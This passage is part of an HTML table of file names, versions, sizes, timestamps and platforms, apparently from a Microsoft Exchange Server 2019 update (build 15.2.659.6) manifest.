applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not 
applicable</td></tr><tr><td>Cts_exsmime.dll</td><td>15.2.659.6</td><td>380,808</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Cts_microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>1,686,408</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Cts_microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts_policy.14.0.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.14.1.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.14.2.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.14.3.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.14.4.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Cts_policy.15.0.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.15.1.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.15.2.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.15.20.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.8.0.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.8.1.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>
12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.8.2.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cts_policy.8.3.microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Dagcommonlibrary.ps1</td><td>Not applicable</td><td>60,242</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Dependentassemblygenerator.exe</td><td>15.2.659.6</td><td>22,400</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Diaghelper.dll</td><td>15.2.659.6</td><td>66,944</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Diagnosticscriptcommonlibrary.ps1</td><td>Not applicable</td><td>16,334</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Disableinmemorytracing.ps1</td><td>Not applicable</td><td>13,362</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Disable_antimalwarescanning.ps1</td><td>Not applicable</td><td>15,189</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Disable_outsidein.ps1</td><td>Not applicable</td><td>13,654</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Disklockerapi.dll</td><td>Not applicable</td><td>22,400</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Dlmigrationmodule.psm1</td><td>Not applicable</td><td>39,580</td><td>12-Aug-2020</td><td>21:26</td><td>Not 
applicable</td></tr><tr><td>Dsaccessperf.dll</td><td>15.2.659.6</td><td>45,952</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Dscperf.dll</td><td>15.2.659.6</td><td>32,648</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Dup_cts_microsoft.exchange.data.common.dll</td><td>15.2.659.6</td><td>1,686,408</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Dup_ext_microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>601,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Ecpperfcounters.xml</td><td>Not applicable</td><td>30,352</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Edgetransport.exe</td><td>15.2.659.6</td><td>49,536</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Eext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not 
applicable</td></tr><tr><td>Eext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Eext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>18:15</td><td>Not 
applicable</td></tr><tr><td>Eext_policy.14.0.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Eext_policy.14.1.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Eext_policy.14.2.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Eext_policy.14.3.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Eext_policy.14.4.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Eext_policy.15.0.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Eext_policy.15.1.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Eext_policy.15.2.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Eext_policy.15.20.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Eext_policy.8.1.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Eext_policy.8.2.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Eext_policy.8.3.microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Enableinmemorytracing.ps1</td><td>Not applicable</td><td>13,364</td><td>12-Aug-2020</td><td>21:26</td><td>Not 
applicable</td></tr><tr><td>Enable_antimalwarescanning.ps1</td><td>Not applicable</td><td>17,563</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Enable_basicauthtooauthconverterhttpmodule.ps1</td><td>Not applicable</td><td>18,588</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Enable_crossforestconnector.ps1</td><td>Not applicable</td><td>18,598</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Enable_outlookcertificateauthentication.ps1</td><td>Not applicable</td><td>22,916</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Enable_outsidein.ps1</td><td>Not applicable</td><td>13,647</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Engineupdateserviceinterfaces.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Escprint.dll</td><td>15.2.659.6</td><td>20,352</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Ese.dll</td><td>15.2.659.6</td><td>3,741,568</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Eseback2.dll</td><td>15.2.659.6</td><td>350,088</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Esebcli2.dll</td><td>15.2.659.6</td><td>318,344</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Eseperf.dll</td><td>15.2.659.6</td><td>108,936</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Eseutil.exe</td><td>15.2.659.6</td><td>425,344</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Esevss.dll</td><td>15.2.659.6</td><td>44,416</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Etweseproviderresources.dll</td><td>15.2.659.6</td><td>101,248</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Eventperf.dll</td><td>15.2.659.6</td><td>59,784</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Exchange.depthtwo.types.ps1xml</td><td>Not 
applicable</td><td>40,093</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Exchange.format.ps1xml</td><td>Not applicable</td><td>649,678</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Exchange.partial.types.ps1xml</td><td>Not applicable</td><td>44,323</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Exchange.ps1</td><td>Not applicable</td><td>20,791</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Exchange.support.format.ps1xml</td><td>Not applicable</td><td>26,535</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Exchange.types.ps1xml</td><td>Not applicable</td><td>365,133</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Exchangeudfcommon.dll</td><td>15.2.659.6</td><td>122,760</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Exchangeudfs.dll</td><td>15.2.659.6</td><td>272,776</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Exchmem.dll</td><td>15.2.659.6</td><td>86,408</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Exchsetupmsg.dll</td><td>15.2.659.6</td><td>19,328</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Exdbfailureitemapi.dll</td><td>Not applicable</td><td>27,008</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Exdbmsg.dll</td><td>15.2.659.6</td><td>230,784</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Exeventperfplugin.dll</td><td>15.2.659.6</td><td>25,472</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Exmime.dll</td><td>15.2.659.6</td><td>364,928</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Exportedgeconfig.ps1</td><td>Not applicable</td><td>27,391</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Export_mailpublicfoldersformigration.ps1</td><td>Not applicable</td><td>18,558</td><td>12-Aug-2020</td><td>21:27</td><td>Not 
applicable</td></tr><tr><td>Export_modernpublicfolderstatistics.ps1</td><td>Not applicable</td><td>29,206</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Export_outlookclassification.ps1</td><td>Not applicable</td><td>14,394</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Export_publicfolderstatistics.ps1</td><td>Not applicable</td><td>23,125</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Export_retentiontags.ps1</td><td>Not applicable</td><td>17,044</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Exppw.dll</td><td>15.2.659.6</td><td>83,336</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Exprfdll.dll</td><td>15.2.659.6</td><td>26,504</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Exrpc32.dll</td><td>15.2.659.6</td><td>2,029,448</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Exrw.dll</td><td>15.2.659.6</td><td>28,040</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Exsetdata.dll</td><td>15.2.659.6</td><td>2,779,520</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Exsetup.exe</td><td>15.2.659.6</td><td>35,200</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Exsetupui.exe</td><td>15.2.659.6</td><td>471,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Extrace.dll</td><td>15.2.659.6</td><td>245,128</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Ext_microsoft.exchange.data.transport.dll</td><td>15.2.659.6</td><td>601,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Exwatson.dll</td><td>15.2.659.6</td><td>44,928</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Fastioext.dll</td><td>15.2.659.6</td><td>60,296</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Fil06f84122c94c91a0458cad45c22cce20</td><td>Not applicable</td><td>784,631</td><td>12-Aug-2020</td><td>21:26</td><td>Not 
applicable</td></tr><tr><td>Fil143a7a5d4894478a85eefc89a6539fc8</td><td>Not applicable</td><td>1,909,261</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil19f527f284a0bb584915f9994f4885c3</td><td>Not applicable</td><td>648,793</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil1a9540363a531e7fb18ffe600cffc3ce</td><td>Not applicable</td><td>358,404</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil220d95210c8697448312eee6628c815c</td><td>Not applicable</td><td>303,656</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil2cf5a31e239a45fabea48687373b547c</td><td>Not applicable</td><td>652,759</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil397f0b1f1d7bd44d6e57e496decea2ec</td><td>Not applicable</td><td>784,628</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil3ab126057b34eee68c4fd4b127ff7aee</td><td>Not applicable</td><td>784,604</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil41bb2e5743e3bde4ecb1e07a76c5a7a8</td><td>Not applicable</td><td>149,154</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Fil51669bfbda26e56e3a43791df94c1e9c</td><td>Not applicable</td><td>9,344</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil558cb84302edfc96e553bcfce2b85286</td><td>Not applicable</td><td>85,258</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil55ce217251b77b97a46e914579fc4c64</td><td>Not applicable</td><td>648,787</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil5a9e78a51a18d05bc36b5e8b822d43a8</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Fil5c7d10e5f1f9ada1e877c9aa087182a9</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>21:25</td><td>Not 
applicable</td></tr><tr><td>Fil6569a92c80a1e14949e4282ae2cc699c</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Fil6a01daba551306a1e55f0bf6894f4d9f</td><td>Not applicable</td><td>648,763</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil8863143ea7cd93a5f197c9fff13686bf</td><td>Not applicable</td><td>648,793</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil8a8c76f225c7205db1000e8864c10038</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Fil8cd999415d36ba78a3ac16a080c47458</td><td>Not applicable</td><td>784,634</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Fil97913e630ff02079ce9889505a517ec0</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Filaa49badb2892075a28d58d06560f8da2</td><td>Not applicable</td><td>785,658</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Filae28aeed23ccb4b9b80accc2d43175b5</td><td>Not applicable</td><td>648,790</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Filb17f496f9d880a684b5c13f6b02d7203</td><td>Not applicable</td><td>784,634</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Filb94ca32f2654692263a5be009c0fe4ca</td><td>Not applicable</td><td>2,564,949</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Filbabdc4808eba0c4f18103f12ae955e5c</td><td>Not applicable</td><td>342,829,683</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Filc92cf2bf29bed21bd5555163330a3d07</td><td>Not applicable</td><td>652,777</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Filcc478d2a8346db20c4e2dc36f3400628</td><td>Not applicable</td><td>784,634</td><td>12-Aug-2020</td><td>21:26</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.entities.tasks.dll</td><td>15.2.
659.6</td><td>100,232</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.xrm.dll</td><td>15.2.659.6</td><td>144,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.entityextraction.calendar.dll</td><td>15.2.659.6</td><td>270,216</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.common.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.configuration.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.dll</td><td>15.2.659.6</td><td>130,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.ews.configuration.dll</td><td>15.2.659.6</td><td>254,344</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>15.2.659.6</td><td>13,176</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>15.2.659.6</td><td>37,248</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>15.2.659.6</td><td>640,896</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.659.6</td><td>37,248</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.659.6</td><td>146,304</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.659.6</td><td>594,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.659.6</td><td>14,712</td><t
d>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.659.6</td><td>30,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.659.6</td><td>99,720</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.659.6</td><td>42,368</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.659.6</td><td>40,320</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.659.6</td><td>54,152</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.659.6</td><td>164,224</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.659.6</td><td>58,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.659.6</td><td>204,160</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.659.6</td><td>30,600</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.659.6</td><td>38,792</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.659.6</td><td>48,520</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.659.6</td><td>180,608</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.659.6</td><td>36,736</td><td>
12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.659.6</td><td>25,984</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.659.6</td><td>1,868,168</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.659.6</td><td>54,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.659.6</td><td>35,704</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.659.6</td><td>35,712</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.659.6</td><td>263,048</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.659.6</td><td>263,048</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.659.6</td><td>53,128</td><td>12-Aug-2020</td><td>21:25</td><td>Not 
